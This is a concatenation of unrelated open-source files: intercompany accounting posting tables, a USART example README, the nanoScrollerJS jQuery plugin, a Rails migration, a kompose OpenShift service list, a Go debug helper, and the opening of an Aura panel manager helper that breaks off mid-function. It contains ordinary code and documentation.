| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Expense (Fabrikam West) | 100.00 | |
| Accounts payable (Fabrikam West) | | 100.00 |
### Credit note is posted to Fabrikam East for vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam East) | 25.00 | |
| Purchase returns (Fabrikam East) | | 25.00 |
### Payment is posted to Fabrikam for vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|--------------|---------------|
| Accounts payable (Fabrikam) | 75.00 | |
| Cash (Fabrikam) | | 75.00 |
### Fabrikam payment is settled with Fabrikam West invoice and Fabrikam East credit note
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|--------------|---------------|
| Due from Fabrikam West (Fabrikam) | 75.00 | |
| Accounts payable (Fabrikam) | | 75.00 |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|----------------------------------------|--------------|---------------|
| Due from Fabrikam West (Fabrikam East) | 25.00 | |
| Accounts payable (Fabrikam East) | | 25.00 |
**Fabrikam West posting**
| Account | Debit amount | Credit amount |
|--------------------------------------|--------------|---------------|
| Accounts payable (Fabrikam West) | 75.00 | |
| Due to Fabrikam (Fabrikam West) | | 75.00 |
| Accounts payable (Fabrikam West) | 25.00 | |
| Due to Fabrikam East (Fabrikam West) | | 25.00 |
| {
"pile_set_name": "Github"
} |
Simple USART Example
--------------------
This example sets up a USART port and provides a few simple
character handling functions so that a short interactive program
can be demonstrated. It re-uses the clock setup from systick_blink,
which means you could do timed delays, but that aspect isn't used.
After this example we do character handling with interrupts.
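For orientation only, a polled-I/O setup along these lines might look
roughly like the sketch below. It assumes a libopencm3-style API on an
STM32-class target; the port choice, pin mux and clock calls are
illustrative assumptions, not this example's actual source.
    /* Minimal sketch (assumed API and target, not the example's real code). */
    #include <libopencm3/stm32/rcc.h>
    #include <libopencm3/stm32/usart.h>
    static void usart_setup(void)
    {
        /* Enable the USART clock; GPIO/pin-mux setup is omitted (board-specific). */
        rcc_periph_clock_enable(RCC_USART1);
        /* 115200 8N1, no flow control, transmit and receive enabled. */
        usart_set_baudrate(USART1, 115200);
        usart_set_databits(USART1, 8);
        usart_set_stopbits(USART1, USART_STOPBITS_1);
        usart_set_parity(USART1, USART_PARITY_NONE);
        usart_set_flow_control(USART1, USART_FLOWCONTROL_NONE);
        usart_set_mode(USART1, USART_MODE_TX_RX);
        usart_enable(USART1);
    }
    /* Simple blocking character I/O, enough for a small interactive loop. */
    static void put_char(char c)
    {
        usart_send_blocking(USART1, c);
    }
    static char get_char(void)
    {
        return (char) usart_recv_blocking(USART1);
    }
An interrupt-driven variant, as mentioned above, would additionally
enable the USART receive interrupt and move the character handling
into the ISR.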
| {
"pile_set_name": "Github"
} |
/*! nanoScrollerJS - v0.8.7 - 2015
* http://jamesflorentino.github.com/nanoScrollerJS/
* Copyright (c) 2015 James Florentino; Licensed MIT */
(function(factory) {
if (typeof define === 'function' && define.amd) {
return define(['jquery'], function($) {
return factory($, window, document);
});
} else if (typeof exports === 'object') {
return module.exports = factory(require('jquery'), window, document);
} else {
return factory(jQuery, window, document);
}
})(function($, window, document) {
"use strict";
var BROWSER_IS_IE7, BROWSER_SCROLLBAR_WIDTH, DOMSCROLL, DOWN, DRAG, ENTER, KEYDOWN, KEYUP, MOUSEDOWN, MOUSEENTER, MOUSEMOVE, MOUSEUP, MOUSEWHEEL, NanoScroll, PANEDOWN, RESIZE, SCROLL, SCROLLBAR, TOUCHMOVE, UP, WHEEL, cAF, defaults, getBrowserScrollbarWidth, hasTransform, isFFWithBuggyScrollbar, rAF, transform, _elementStyle, _prefixStyle, _vendor;
defaults = {
/**
a classname for the pane element.
@property paneClass
@type String
@default 'nano-pane'
*/
paneClass: 'nano-pane',
/**
a classname for the slider element.
@property sliderClass
@type String
@default 'nano-slider'
*/
sliderClass: 'nano-slider',
/**
a classname for the content element.
@property contentClass
@type String
@default 'nano-content'
*/
contentClass: 'nano-content',
/**
a classname for enabled mode
@property enabledClass
@type String
@default 'has-scrollbar'
*/
enabledClass: 'has-scrollbar',
/**
a classname for flashed mode
@property flashedClass
@type String
@default 'flashed'
*/
flashedClass: 'flashed',
/**
a classname for active mode
@property activeClass
@type String
@default 'active'
*/
activeClass: 'active',
/**
a setting to enable native scrolling in iOS devices.
@property iOSNativeScrolling
@type Boolean
@default false
*/
iOSNativeScrolling: false,
/**
a setting to prevent the rest of the page being
scrolled when user scrolls the `.content` element.
@property preventPageScrolling
@type Boolean
@default false
*/
preventPageScrolling: false,
/**
a setting to disable binding to the resize event.
@property disableResize
@type Boolean
@default false
*/
disableResize: false,
/**
a setting to make the scrollbar always visible.
@property alwaysVisible
@type Boolean
@default false
*/
alwaysVisible: false,
/**
a default timeout for the `flash()` method.
@property flashDelay
@type Number
@default 1500
*/
flashDelay: 1500,
/**
a minimum height for the `.slider` element.
@property sliderMinHeight
@type Number
@default 20
*/
sliderMinHeight: 20,
/**
a maximum height for the `.slider` element.
@property sliderMaxHeight
@type Number
@default null
*/
sliderMaxHeight: null,
/**
an alternate document context.
@property documentContext
@type Document
@default null
*/
documentContext: null,
/**
an alternate window context.
@property windowContext
@type Window
@default null
*/
windowContext: null
};
/**
@property SCROLLBAR
@type String
@static
@final
@private
*/
SCROLLBAR = 'scrollbar';
/**
@property SCROLL
@type String
@static
@final
@private
*/
SCROLL = 'scroll';
/**
@property MOUSEDOWN
@type String
@final
@private
*/
MOUSEDOWN = 'mousedown';
/**
@property MOUSEENTER
@type String
@final
@private
*/
MOUSEENTER = 'mouseenter';
/**
@property MOUSEMOVE
@type String
@static
@final
@private
*/
MOUSEMOVE = 'mousemove';
/**
@property MOUSEWHEEL
@type String
@final
@private
*/
MOUSEWHEEL = 'mousewheel';
/**
@property MOUSEUP
@type String
@static
@final
@private
*/
MOUSEUP = 'mouseup';
/**
@property RESIZE
@type String
@final
@private
*/
RESIZE = 'resize';
/**
@property DRAG
@type String
@static
@final
@private
*/
DRAG = 'drag';
/**
@property ENTER
@type String
@static
@final
@private
*/
ENTER = 'enter';
/**
@property UP
@type String
@static
@final
@private
*/
UP = 'up';
/**
@property PANEDOWN
@type String
@static
@final
@private
*/
PANEDOWN = 'panedown';
/**
@property DOMSCROLL
@type String
@static
@final
@private
*/
DOMSCROLL = 'DOMMouseScroll';
/**
@property DOWN
@type String
@static
@final
@private
*/
DOWN = 'down';
/**
@property WHEEL
@type String
@static
@final
@private
*/
WHEEL = 'wheel';
/**
@property KEYDOWN
@type String
@static
@final
@private
*/
KEYDOWN = 'keydown';
/**
@property KEYUP
@type String
@static
@final
@private
*/
KEYUP = 'keyup';
/**
@property TOUCHMOVE
@type String
@static
@final
@private
*/
TOUCHMOVE = 'touchmove';
/**
@property BROWSER_IS_IE7
@type Boolean
@static
@final
@private
*/
BROWSER_IS_IE7 = window.navigator.appName === 'Microsoft Internet Explorer' && /msie 7./i.test(window.navigator.appVersion) && window.ActiveXObject;
/**
@property BROWSER_SCROLLBAR_WIDTH
@type Number
@static
@default null
@private
*/
BROWSER_SCROLLBAR_WIDTH = null;
rAF = window.requestAnimationFrame;
cAF = window.cancelAnimationFrame;
_elementStyle = document.createElement('div').style;
_vendor = (function() {
var i, transform, vendor, vendors, _i, _len;
vendors = ['t', 'webkitT', 'MozT', 'msT', 'OT'];
for (i = _i = 0, _len = vendors.length; _i < _len; i = ++_i) {
vendor = vendors[i];
transform = vendors[i] + 'ransform';
if (transform in _elementStyle) {
return vendors[i].substr(0, vendors[i].length - 1);
}
}
return false;
})();
_prefixStyle = function(style) {
if (_vendor === false) {
return false;
}
if (_vendor === '') {
return style;
}
return _vendor + style.charAt(0).toUpperCase() + style.substr(1);
};
transform = _prefixStyle('transform');
hasTransform = transform !== false;
/**
Returns browser's native scrollbar width
@method getBrowserScrollbarWidth
@return {Number} the scrollbar width in pixels
@static
@private
*/
getBrowserScrollbarWidth = function() {
var outer, outerStyle, scrollbarWidth;
outer = document.createElement('div');
outerStyle = outer.style;
outerStyle.position = 'absolute';
outerStyle.width = '100px';
outerStyle.height = '100px';
outerStyle.overflow = SCROLL;
outerStyle.top = '-9999px';
document.body.appendChild(outer);
scrollbarWidth = outer.offsetWidth - outer.clientWidth;
document.body.removeChild(outer);
return scrollbarWidth;
};
isFFWithBuggyScrollbar = function() {
var isOSXFF, ua, version;
ua = window.navigator.userAgent;
isOSXFF = /(?=.+Mac OS X)(?=.+Firefox)/.test(ua);
if (!isOSXFF) {
return false;
}
version = /Firefox\/\d{2}\./.exec(ua);
if (version) {
version = version[0].replace(/\D+/g, '');
}
return isOSXFF && +version > 23;
};
/**
@class NanoScroll
@param element {HTMLElement|Node} the main element
@param options {Object} nanoScroller's options
@constructor
*/
NanoScroll = (function() {
function NanoScroll(el, options) {
this.el = el;
this.options = options;
BROWSER_SCROLLBAR_WIDTH || (BROWSER_SCROLLBAR_WIDTH = getBrowserScrollbarWidth());
this.$el = $(this.el);
this.doc = $(this.options.documentContext || document);
this.win = $(this.options.windowContext || window);
this.body = this.doc.find('body');
this.$content = this.$el.children("." + this.options.contentClass);
this.$content.attr('tabindex', this.options.tabIndex || 0);
this.content = this.$content[0];
this.previousPosition = 0;
if (this.options.iOSNativeScrolling && (this.el.style.WebkitOverflowScrolling != null)) {
this.nativeScrolling();
} else {
this.generate();
}
this.createEvents();
this.addEvents();
this.reset();
}
/**
Prevents the rest of the page being scrolled
when user scrolls the `.nano-content` element.
@method preventScrolling
@param event {Event}
@param direction {String} Scroll direction (up or down)
@private
*/
NanoScroll.prototype.preventScrolling = function(e, direction) {
if (!this.isActive) {
return;
}
if (e.type === DOMSCROLL) {
if (direction === DOWN && e.originalEvent.detail > 0 || direction === UP && e.originalEvent.detail < 0) {
e.preventDefault();
}
} else if (e.type === MOUSEWHEEL) {
if (!e.originalEvent || !e.originalEvent.wheelDelta) {
return;
}
if (direction === DOWN && e.originalEvent.wheelDelta < 0 || direction === UP && e.originalEvent.wheelDelta > 0) {
e.preventDefault();
}
}
};
/**
Enable iOS native scrolling
@method nativeScrolling
@private
*/
NanoScroll.prototype.nativeScrolling = function() {
this.$content.css({
WebkitOverflowScrolling: 'touch'
});
this.iOSNativeScrolling = true;
this.isActive = true;
};
/**
Updates those nanoScroller properties that
are related to current scrollbar position.
@method updateScrollValues
@private
*/
NanoScroll.prototype.updateScrollValues = function() {
var content, direction;
content = this.content;
this.maxScrollTop = content.scrollHeight - content.clientHeight;
this.prevScrollTop = this.contentScrollTop || 0;
this.contentScrollTop = content.scrollTop;
direction = this.contentScrollTop > this.previousPosition ? "down" : this.contentScrollTop < this.previousPosition ? "up" : "same";
this.previousPosition = this.contentScrollTop;
if (direction !== "same") {
this.$el.trigger('update', {
position: this.contentScrollTop,
maximum: this.maxScrollTop,
direction: direction
});
}
if (!this.iOSNativeScrolling) {
this.maxSliderTop = this.paneHeight - this.sliderHeight;
this.sliderTop = this.maxScrollTop === 0 ? 0 : this.contentScrollTop * this.maxSliderTop / this.maxScrollTop;
}
};
/**
Updates CSS styles for current scroll position.
    Uses CSS 2d transforms and `window.requestAnimationFrame` if available.
@method setOnScrollStyles
@private
*/
NanoScroll.prototype.setOnScrollStyles = function() {
var cssValue;
if (hasTransform) {
cssValue = {};
cssValue[transform] = "translate(0, " + this.sliderTop + "px)";
} else {
cssValue = {
top: this.sliderTop
};
}
if (rAF) {
if (cAF && this.scrollRAF) {
cAF(this.scrollRAF);
}
this.scrollRAF = rAF((function(_this) {
return function() {
_this.scrollRAF = null;
return _this.slider.css(cssValue);
};
})(this));
} else {
this.slider.css(cssValue);
}
};
/**
Creates event related methods
@method createEvents
@private
*/
NanoScroll.prototype.createEvents = function() {
this.events = {
down: (function(_this) {
return function(e) {
_this.isBeingDragged = true;
_this.offsetY = e.pageY - _this.slider.offset().top;
if (!_this.slider.is(e.target)) {
_this.offsetY = 0;
}
_this.pane.addClass(_this.options.activeClass);
_this.doc.bind(MOUSEMOVE, _this.events[DRAG]).bind(MOUSEUP, _this.events[UP]);
_this.body.bind(MOUSEENTER, _this.events[ENTER]);
return false;
};
})(this),
drag: (function(_this) {
return function(e) {
_this.sliderY = e.pageY - _this.$el.offset().top - _this.paneTop - (_this.offsetY || _this.sliderHeight * 0.5);
_this.scroll();
if (_this.contentScrollTop >= _this.maxScrollTop && _this.prevScrollTop !== _this.maxScrollTop) {
_this.$el.trigger('scrollend');
} else if (_this.contentScrollTop === 0 && _this.prevScrollTop !== 0) {
_this.$el.trigger('scrolltop');
}
return false;
};
})(this),
up: (function(_this) {
return function(e) {
_this.isBeingDragged = false;
_this.pane.removeClass(_this.options.activeClass);
_this.doc.unbind(MOUSEMOVE, _this.events[DRAG]).unbind(MOUSEUP, _this.events[UP]);
_this.body.unbind(MOUSEENTER, _this.events[ENTER]);
return false;
};
})(this),
resize: (function(_this) {
return function(e) {
_this.reset();
};
})(this),
panedown: (function(_this) {
return function(e) {
_this.sliderY = (e.offsetY || e.originalEvent.layerY) - (_this.sliderHeight * 0.5);
_this.scroll();
_this.events.down(e);
return false;
};
})(this),
scroll: (function(_this) {
return function(e) {
_this.updateScrollValues();
if (_this.isBeingDragged) {
return;
}
if (!_this.iOSNativeScrolling) {
_this.sliderY = _this.sliderTop;
_this.setOnScrollStyles();
}
if (e == null) {
return;
}
if (_this.contentScrollTop >= _this.maxScrollTop) {
if (_this.options.preventPageScrolling) {
_this.preventScrolling(e, DOWN);
}
if (_this.prevScrollTop !== _this.maxScrollTop) {
_this.$el.trigger('scrollend');
}
} else if (_this.contentScrollTop === 0) {
if (_this.options.preventPageScrolling) {
_this.preventScrolling(e, UP);
}
if (_this.prevScrollTop !== 0) {
_this.$el.trigger('scrolltop');
}
}
};
})(this),
wheel: (function(_this) {
return function(e) {
var delta;
if (e == null) {
return;
}
delta = e.delta || e.wheelDelta || (e.originalEvent && e.originalEvent.wheelDelta) || -e.detail || (e.originalEvent && -e.originalEvent.detail);
if (delta) {
_this.sliderY += -delta / 3;
}
_this.scroll();
return false;
};
})(this),
enter: (function(_this) {
return function(e) {
var _ref;
if (!_this.isBeingDragged) {
return;
}
if ((e.buttons || e.which) !== 1) {
return (_ref = _this.events)[UP].apply(_ref, arguments);
}
};
})(this)
};
};
/**
Adds event listeners with jQuery.
@method addEvents
@private
*/
NanoScroll.prototype.addEvents = function() {
var events;
this.removeEvents();
events = this.events;
if (!this.options.disableResize) {
this.win.bind(RESIZE, events[RESIZE]);
}
if (!this.iOSNativeScrolling) {
this.slider.bind(MOUSEDOWN, events[DOWN]);
this.pane.bind(MOUSEDOWN, events[PANEDOWN]).bind("" + MOUSEWHEEL + " " + DOMSCROLL, events[WHEEL]);
}
this.$content.bind("" + SCROLL + " " + MOUSEWHEEL + " " + DOMSCROLL + " " + TOUCHMOVE, events[SCROLL]);
};
/**
Removes event listeners with jQuery.
@method removeEvents
@private
*/
NanoScroll.prototype.removeEvents = function() {
var events;
events = this.events;
this.win.unbind(RESIZE, events[RESIZE]);
if (!this.iOSNativeScrolling) {
this.slider.unbind();
this.pane.unbind();
}
this.$content.unbind("" + SCROLL + " " + MOUSEWHEEL + " " + DOMSCROLL + " " + TOUCHMOVE, events[SCROLL]);
};
/**
Generates nanoScroller's scrollbar and elements for it.
@method generate
@chainable
@private
*/
NanoScroll.prototype.generate = function() {
var contentClass, cssRule, currentPadding, options, pane, paneClass, sliderClass;
options = this.options;
paneClass = options.paneClass, sliderClass = options.sliderClass, contentClass = options.contentClass;
if (!(pane = this.$el.children("." + paneClass)).length && !pane.children("." + sliderClass).length) {
this.$el.append("<div class=\"" + paneClass + "\"><div class=\"" + sliderClass + "\" /></div>");
}
this.pane = this.$el.children("." + paneClass);
this.slider = this.pane.find("." + sliderClass);
if (BROWSER_SCROLLBAR_WIDTH === 0 && isFFWithBuggyScrollbar()) {
currentPadding = window.getComputedStyle(this.content, null).getPropertyValue('padding-right').replace(/[^0-9.]+/g, '');
cssRule = {
right: -14,
paddingRight: +currentPadding + 14
};
} else if (BROWSER_SCROLLBAR_WIDTH) {
cssRule = {
right: -BROWSER_SCROLLBAR_WIDTH
};
this.$el.addClass(options.enabledClass);
}
if (cssRule != null) {
this.$content.css(cssRule);
}
return this;
};
/**
@method restore
@private
*/
NanoScroll.prototype.restore = function() {
this.stopped = false;
if (!this.iOSNativeScrolling) {
this.pane.show();
}
this.addEvents();
};
/**
Resets nanoScroller's scrollbar.
@method reset
@chainable
@example
$(".nano").nanoScroller();
*/
NanoScroll.prototype.reset = function() {
var content, contentHeight, contentPosition, contentStyle, contentStyleOverflowY, paneBottom, paneHeight, paneOuterHeight, paneTop, parentMaxHeight, right, sliderHeight;
if (this.iOSNativeScrolling) {
this.contentHeight = this.content.scrollHeight;
return;
}
if (!this.$el.find("." + this.options.paneClass).length) {
this.generate().stop();
}
if (this.stopped) {
this.restore();
}
content = this.content;
contentStyle = content.style;
contentStyleOverflowY = contentStyle.overflowY;
if (BROWSER_IS_IE7) {
this.$content.css({
height: this.$content.height()
});
}
contentHeight = content.scrollHeight + BROWSER_SCROLLBAR_WIDTH;
parentMaxHeight = parseInt(this.$el.css("max-height"), 10);
if (parentMaxHeight > 0) {
this.$el.height("");
this.$el.height(content.scrollHeight > parentMaxHeight ? parentMaxHeight : content.scrollHeight);
}
paneHeight = this.pane.outerHeight(false);
paneTop = parseInt(this.pane.css('top'), 10);
paneBottom = parseInt(this.pane.css('bottom'), 10);
paneOuterHeight = paneHeight + paneTop + paneBottom;
sliderHeight = Math.round(paneOuterHeight / contentHeight * paneHeight);
if (sliderHeight < this.options.sliderMinHeight) {
sliderHeight = this.options.sliderMinHeight;
} else if ((this.options.sliderMaxHeight != null) && sliderHeight > this.options.sliderMaxHeight) {
sliderHeight = this.options.sliderMaxHeight;
}
if (contentStyleOverflowY === SCROLL && contentStyle.overflowX !== SCROLL) {
sliderHeight += BROWSER_SCROLLBAR_WIDTH;
}
this.maxSliderTop = paneOuterHeight - sliderHeight;
this.contentHeight = contentHeight;
this.paneHeight = paneHeight;
this.paneOuterHeight = paneOuterHeight;
this.sliderHeight = sliderHeight;
this.paneTop = paneTop;
this.slider.height(sliderHeight);
this.events.scroll();
this.pane.show();
this.isActive = true;
if ((content.scrollHeight === content.clientHeight) || (this.pane.outerHeight(true) >= content.scrollHeight && contentStyleOverflowY !== SCROLL)) {
this.pane.hide();
this.isActive = false;
} else if (this.el.clientHeight === content.scrollHeight && contentStyleOverflowY === SCROLL) {
this.slider.hide();
} else {
this.slider.show();
}
this.pane.css({
opacity: (this.options.alwaysVisible ? 1 : ''),
visibility: (this.options.alwaysVisible ? 'visible' : '')
});
contentPosition = this.$content.css('position');
if (contentPosition === 'static' || contentPosition === 'relative') {
right = parseInt(this.$content.css('right'), 10);
if (right) {
this.$content.css({
right: '',
marginRight: right
});
}
}
return this;
};
/**
@method scroll
@private
@example
$(".nano").nanoScroller({ scroll: 'top' });
*/
NanoScroll.prototype.scroll = function() {
if (!this.isActive) {
return;
}
this.sliderY = Math.max(0, this.sliderY);
this.sliderY = Math.min(this.maxSliderTop, this.sliderY);
this.$content.scrollTop(this.maxScrollTop * this.sliderY / this.maxSliderTop);
if (!this.iOSNativeScrolling) {
this.updateScrollValues();
this.setOnScrollStyles();
}
return this;
};
/**
Scroll at the bottom with an offset value
@method scrollBottom
@param offsetY {Number}
@chainable
@example
$(".nano").nanoScroller({ scrollBottom: value });
*/
NanoScroll.prototype.scrollBottom = function(offsetY) {
if (!this.isActive) {
return;
}
this.$content.scrollTop(this.contentHeight - this.$content.height() - offsetY).trigger(MOUSEWHEEL);
this.stop().restore();
return this;
};
/**
Scroll at the top with an offset value
@method scrollTop
@param offsetY {Number}
@chainable
@example
$(".nano").nanoScroller({ scrollTop: value });
*/
NanoScroll.prototype.scrollTop = function(offsetY) {
if (!this.isActive) {
return;
}
this.$content.scrollTop(+offsetY).trigger(MOUSEWHEEL);
this.stop().restore();
return this;
};
/**
Scroll to an element
@method scrollTo
@param node {Node} A node to scroll to.
@chainable
@example
$(".nano").nanoScroller({ scrollTo: $('#a_node') });
*/
NanoScroll.prototype.scrollTo = function(node) {
if (!this.isActive) {
return;
}
this.scrollTop(this.$el.find(node).get(0).offsetTop);
return this;
};
/**
To stop the operation.
This option will tell the plugin to disable all event bindings and hide the gadget scrollbar from the UI.
@method stop
@chainable
@example
$(".nano").nanoScroller({ stop: true });
*/
NanoScroll.prototype.stop = function() {
if (cAF && this.scrollRAF) {
cAF(this.scrollRAF);
this.scrollRAF = null;
}
this.stopped = true;
this.removeEvents();
if (!this.iOSNativeScrolling) {
this.pane.hide();
}
return this;
};
/**
Destroys nanoScroller and restores browser's native scrollbar.
@method destroy
@chainable
@example
$(".nano").nanoScroller({ destroy: true });
*/
NanoScroll.prototype.destroy = function() {
if (!this.stopped) {
this.stop();
}
if (!this.iOSNativeScrolling && this.pane.length) {
this.pane.remove();
}
if (BROWSER_IS_IE7) {
this.$content.height('');
}
this.$content.removeAttr('tabindex');
if (this.$el.hasClass(this.options.enabledClass)) {
this.$el.removeClass(this.options.enabledClass);
this.$content.css({
right: ''
});
}
return this;
};
/**
To flash the scrollbar gadget for an amount of time defined in plugin settings (defaults to 1.5s).
Useful if you want to show the user (e.g. on page load) that there is more content waiting for them.
@method flash
@chainable
@example
$(".nano").nanoScroller({ flash: true });
*/
NanoScroll.prototype.flash = function() {
if (this.iOSNativeScrolling) {
return;
}
if (!this.isActive) {
return;
}
this.reset();
this.pane.addClass(this.options.flashedClass);
setTimeout((function(_this) {
return function() {
_this.pane.removeClass(_this.options.flashedClass);
};
})(this), this.options.flashDelay);
return this;
};
return NanoScroll;
})();
$.fn.nanoScroller = function(settings) {
return this.each(function() {
var options, scrollbar;
if (!(scrollbar = this.nanoscroller)) {
options = $.extend({}, defaults, settings);
this.nanoscroller = scrollbar = new NanoScroll(this, options);
}
if (settings && typeof settings === "object") {
$.extend(scrollbar.options, settings);
if (settings.scrollBottom != null) {
return scrollbar.scrollBottom(settings.scrollBottom);
}
if (settings.scrollTop != null) {
return scrollbar.scrollTop(settings.scrollTop);
}
if (settings.scrollTo) {
return scrollbar.scrollTo(settings.scrollTo);
}
if (settings.scroll === 'bottom') {
return scrollbar.scrollBottom(0);
}
if (settings.scroll === 'top') {
return scrollbar.scrollTop(0);
}
if (settings.scroll && settings.scroll instanceof $) {
return scrollbar.scrollTo(settings.scroll);
}
if (settings.stop) {
return scrollbar.stop();
}
if (settings.destroy) {
return scrollbar.destroy();
}
if (settings.flash) {
return scrollbar.flash();
}
}
return scrollbar.reset();
});
};
$.fn.nanoScroller.Constructor = NanoScroll;
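/*
Usage sketch (illustrative only, not executed here): how the settings dispatch
above is typically driven from application code. The selector and the option
values are assumptions for this example, not part of this file.
  $(".nano").nanoScroller();                            // build the custom scrollbar
  $(".nano").nanoScroller({ scroll: 'top' });           // jump back to the top
  $(".nano").nanoScroller({ scrollTo: $('#a_node') });  // scroll to a specific node
  $(".nano").nanoScroller({ flash: true });             // briefly reveal the slider
  $(".nano").nanoScroller({ destroy: true });           // restore native scrolling
*/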
});
//# sourceMappingURL=jquery.nanoscroller.js.map
| {
"pile_set_name": "Github"
} |
class CacheLookupValuesCount < ActiveRecord::Migration[4.2]
def up
execute "update lookup_keys set lookup_values_count=(select count(*) from lookup_values where lookup_key_id=lookup_keys.id)"
end
def down
end
end
| {
"pile_set_name": "Github"
} |
{
"kind": "List",
"apiVersion": "v1",
"metadata": {},
"items": [
{
"kind": "Service",
"apiVersion": "v1",
"metadata": {
"name": "redis",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "redis"
},
"annotations": {
"kompose.cmd": "kompose --provider=openshift convert --stdout -j",
"kompose.version": "%VERSION%"
}
},
"spec": {
"ports": [
{
"name": "6379",
"port": 6379,
"targetPort": 6379
}
],
"selector": {
"io.kompose.service": "redis"
}
},
"status": {
"loadBalancer": {}
}
},
{
"kind": "Service",
"apiVersion": "v1",
"metadata": {
"name": "web",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "web"
},
"annotations": {
"kompose.cmd": "kompose --provider=openshift convert --stdout -j",
"kompose.version": "%VERSION%"
}
},
"spec": {
"ports": [
{
"name": "5000",
"port": 5000,
"targetPort": 5000
}
],
"selector": {
"io.kompose.service": "web"
}
},
"status": {
"loadBalancer": {}
}
},
{
"kind": "DeploymentConfig",
"apiVersion": "v1",
"metadata": {
"name": "redis",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "redis"
},
"annotations": {
"kompose.cmd": "kompose --provider=openshift convert --stdout -j",
"kompose.version": "%VERSION%"
}
},
"spec": {
"strategy": {
"resources": {}
},
"triggers": [
{
"type": "ConfigChange"
},
{
"type": "ImageChange",
"imageChangeParams": {
"automatic": true,
"containerNames": [
"redis"
],
"from": {
"kind": "ImageStreamTag",
"name": "redis:3.0"
}
}
}
],
"replicas": 1,
"test": false,
"selector": {
"io.kompose.service": "redis"
},
"template": {
"metadata": {
"creationTimestamp": null,
"labels": {
"io.kompose.service": "redis"
}
},
"spec": {
"containers": [
{
"name": "redis",
"image": " ",
"ports": [
{
"containerPort": 6379
}
],
"resources": {}
}
],
"restartPolicy": "Always"
}
}
},
"status": {}
},
{
"kind": "ImageStream",
"apiVersion": "v1",
"metadata": {
"name": "redis",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "redis"
}
},
"spec": {
"tags": [
{
"name": "3.0",
"annotations": null,
"from": {
"kind": "DockerImage",
"name": "redis:3.0"
},
"generation": null,
"importPolicy": {}
}
]
},
"status": {
"dockerImageRepository": ""
}
},
{
"kind": "DeploymentConfig",
"apiVersion": "v1",
"metadata": {
"name": "web",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "web"
},
"annotations": {
"kompose.cmd": "kompose --provider=openshift convert --stdout -j",
"kompose.version": "%VERSION%"
}
},
"spec": {
"strategy": {
"resources": {}
},
"triggers": [
{
"type": "ConfigChange"
},
{
"type": "ImageChange",
"imageChangeParams": {
"automatic": true,
"containerNames": [
"web"
],
"from": {
"kind": "ImageStreamTag",
"name": "web:latest"
}
}
}
],
"replicas": 1,
"test": false,
"selector": {
"io.kompose.service": "web"
},
"template": {
"metadata": {
"creationTimestamp": null,
"labels": {
"io.kompose.service": "web"
}
},
"spec": {
"containers": [
{
"name": "web",
"image": " ",
"ports": [
{
"containerPort": 5000
}
],
"resources": {}
}
],
"restartPolicy": "Always"
}
}
},
"status": {}
},
{
"kind": "ImageStream",
"apiVersion": "v1",
"metadata": {
"name": "web",
"creationTimestamp": null,
"labels": {
"io.kompose.service": "web"
}
},
"spec": {
"tags": [
{
"name": "latest",
"annotations": null,
"from": {
"kind": "DockerImage",
"name": "tuna/docker-counter23"
},
"generation": null,
"importPolicy": {}
}
]
},
"status": {
"dockerImageRepository": ""
}
}
]
}
| {
"pile_set_name": "Github"
} |
package lintdebug
import "fmt"
var (
callbacks []func(string)
)
// Send a debug message
func Send(msg string, args ...interface{}) {
formatted := fmt.Sprintf(msg, args...)
for _, cb := range callbacks {
cb(formatted)
}
}
// Register a debug events receiver. There must be only one receiver.
func Register(cb func(string)) {
callbacks = append(callbacks, cb)
}
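// Usage sketch (illustrative only; the log sink and variables below are
// assumptions, not part of this package):
//
//	lintdebug.Register(func(msg string) { log.Println("lint:", msg) })
//	lintdebug.Send("analyzed %d files", fileCount)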
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2013 salesforce.com, inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
({
PANELS_OWNER : {}, // Owner relationship: panel global id (key) -> global id of the component that owns it (value)
PANELS_STACK : [], // The Panel Stack ordering
PANELS_INSTANCE : {}, // Registered instances
containerManager: null, // a reference to containerManager
hasLocationChangeHandler: false, // Indicates whether a locationChange handler has already been attached
initialize: function(cmp) {
var containerManager = this.cmLib.containerManager;
var sharedContainer = cmp.get('v.useSharedContainer');
this.containerManager = sharedContainer ? containerManager.getSharedInstance() : containerManager.createInstance(cmp.find('container'));
this.initializeRegisteredPanels(cmp);
},
/*
* Store internal defs
* @private
*/
initializeRegisteredPanels: function (cmp, newPanels) {
this.containerManager.registerContainers(newPanels || cmp.get('v.registeredPanels') || []);
},
/*
* Dynamically register panels. Used to register feature specific panels.
* @private
*/
registerPanels: function(cmp, params) {
var panels = params.panels;
if (panels) {
this.containerManager.registerContainers(panels);
if ($A.util.isFunction(params.callback)) {
params.callback();
}
}
},
/*
* Create panel
* @public
*/
createPanel: function (cmp, config) {
var panelConfig = config.panelConfig || {};
var referenceElement = panelConfig.referenceElement;
panelConfig.referenceElement = null;
// Create panel instance
var panel = this.createPanelInstance(cmp, config);
if (referenceElement) {
panel.set('v.referenceElement', referenceElement);
}
// Save instance config
this.PANELS_INSTANCE[panel.getGlobalId()] = {
panel : panel,
destroyCallback : config.onDestroy,
closeOnLocationChange: this.getLocationChangeFlag(cmp, config)
};
// Set owner
this.setPanelOwner(panel, config.owner);
// onInit
if (config.onInit) {
config.onInit(panel);
}
// Render
this.renderPanelInstance(cmp, panel, config);
// Stack panel
this.stackPanel(panel);
// onCreate
if (config.onCreate) {
config.onCreate(panel);
}
},
/*
* Get Active panel
* @public
*/
getActivePanel: function (cmp, callback) {
// TODO: Instead of assuming it is the last one (which doesn't guarantee that it is "active"),
// change the active-panel logic so that we save that state internally
var stack = this.PANELS_STACK;
var panel = stack[stack.length - 1];
if (panel && $A.util.isFunction(callback)) {
callback(panel);
